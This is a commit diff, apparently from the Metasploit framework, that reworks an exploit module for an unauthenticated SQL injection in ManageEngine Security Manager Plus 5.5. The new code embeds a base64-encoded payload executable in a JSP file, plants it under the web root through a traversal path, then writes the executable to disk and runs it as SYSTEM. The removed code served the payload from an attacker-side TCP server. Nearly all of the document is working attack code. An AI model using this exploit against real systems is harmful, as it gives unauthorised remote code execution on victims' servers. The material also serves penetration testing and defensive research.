Write EXE to JSP instead of using a TCPServer

unstable
sinn3r 2012-10-23 11:32:09 -05:00
parent e5ec51a780
commit 923ffe277d
1 changed files with 18 additions and 57 deletions

View File

@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::EXE include Msf::Exploit::EXE
def initialize(info={}) def initialize(info={})
@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection", 'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
'Description' => %q{ 'Description' => %q{
This module exploits a SQL injection found in ManageEngine Security Manager Plus This module exploits a SQL injection found in ManageEngine Security Manager Plus
advanced search page. It will send a malicious SQL query to create a JSP file advanced search page, which results in remote code execution under the context of
under the web root directory, and then let it download and execute our malicious SYSTEM. Authentication is not required in order to exploit this vulnerability.
executable under the context of SYSTEM. Authentication is not required in order
to exploit this vulnerability.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
#
# Transfer the malicious executable to our victim
#
def on_client_connect(cli)
print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
cli.put(@native_payload)
service.close_client(cli)
end
# #
# Generate a download+exe JSP payload # Generate a download+exe JSP payload
# #
@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
my_port = datastore['SRVPORT'] my_port = datastore['SRVPORT']
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) native_payload = Rex::Text.encode_base64(generate_payload_exe)
var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3) native_payload_name = rand_text_alpha(rand(6)+3)
var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
var_socket = Rex::Text.rand_text_alpha(rand(8) + 3)
var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
var_temp = Rex::Text.rand_text_alpha(rand(8) + 3)
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
jsp = %Q| jsp = %Q|
<%@page import="java.io.*"%> <%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%@page import="sun.misc.BASE64Decoder"%> <%@page import="sun.misc.BASE64Decoder"%>
<% <%
StringBuffer #{var_buf} = new StringBuffer(); byte[] shellcode = null;
byte[] #{var_shellcode} = null; BufferedOutputStream outstream = null;
BufferedOutputStream #{var_outstream} = null;
try { try {
Socket #{var_socket} = new Socket("#{my_host}", #{my_port}); String buf = "#{native_payload}";
BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
while (#{var_buf}.length() < #{@native_payload.length}) {
#{var_buf}.append( (char) #{var_bufreader}.read());
}
BASE64Decoder #{var_decoder} = new BASE64Decoder(); BASE64Decoder decoder = new BASE64Decoder();
#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); shellcode = decoder.decodeBuffer(buf.toString());
File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe"); File temp = File.createTempFile("#{native_payload_name}", ".exe");
String #{var_path} = #{var_temp}.getAbsolutePath(); String path = temp.getAbsolutePath();
#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); outstream = new BufferedOutputStream(new FileOutputStream(path));
#{var_outstream}.write(#{var_shellcode}); outstream.write(shellcode);
#{var_outstream}.close(); outstream.close();
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); Process p = Runtime.getRuntime().exec(path);
} catch (Exception e) {} } catch (Exception e) {}
%> %>
| |
@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
# Run the actual exploit # Run the actual exploit
# #
def inject_exec def inject_exec
# This little lag is meant to ensure the TCP server runs first before the requests
select(nil, nil, nil, 1)
# Inject our JSP payload # Inject our JSP payload
hex_jsp = generate_jsp_payload hex_jsp = generate_jsp_payload
@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
# The server must start first, and then we send the malicious requests # The server must start first, and then we send the malicious requests
# #
def exploit def exploit
# Avoid passing this as an argument for performance reasons @jsp_name = rand_text_alpha(rand(6)+3)
# This is in base64 is make sure our file isn't mangled @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
@native_payload = [generate_payload_exe].pack("m*")
@native_payload_name = rand_text_alpha(rand(6)+3)
@jsp_name = rand_text_alpha(rand(6)+3)
@outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
begin inject_exec
t = framework.threads.spawn("reqs", false) { inject_exec }
print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
super
ensure
t.kill
end
end end
end end